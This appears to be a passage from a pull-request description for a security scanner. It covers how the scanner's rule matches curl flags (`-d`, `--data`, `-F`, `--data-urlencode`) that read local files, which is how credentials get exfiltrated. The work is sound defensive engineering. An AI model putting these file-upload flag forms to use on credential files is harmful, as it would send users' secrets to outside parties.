- Round 2 found the separator broadening over-matched: a `name=` prefix on the plain data flags (`-d name=@f`, `--data foo=@f`) is sent by curl as a literal string (no file read), so firing there was a false positive. Fixed by requiring the `@` to be value-initial for `-d`/`--data`/`--data-binary`/`--data-ascii`, keeping the field prefix only where curl actually reads it (`-F`/`--form name=@f`, `--data-urlencode name@f`). Verified against curl 8.7.1 semantics.

Follow-ups filed: **#587** (v2 scope for CSR — env-var destinations, `$(cat)` bodies, more credential files, non-curl channels) and **#586** (a pre-existing narrative bug where any `CRED-`-class finding without a value reshapes to an empty "unknown" hardcoded secret in package narratives; the directory `secure` path is unaffected). This PR does not close #475/#467 — their exit-code/decimal-spelling halves are AST-dataflow work gated on #424.
